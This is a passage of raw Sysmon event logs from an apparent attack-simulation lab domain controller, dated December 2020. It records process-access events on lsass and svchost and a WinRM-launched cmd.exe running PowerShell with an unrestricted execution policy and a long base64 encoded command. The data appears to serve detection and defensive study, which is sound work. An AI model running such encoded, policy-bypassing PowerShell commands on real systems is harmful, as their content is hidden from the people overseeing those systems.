EIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-85A1-5FCF-DF00-000000009101}31963672C:\Windows\system32\WinrsHost.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.739{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.723{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 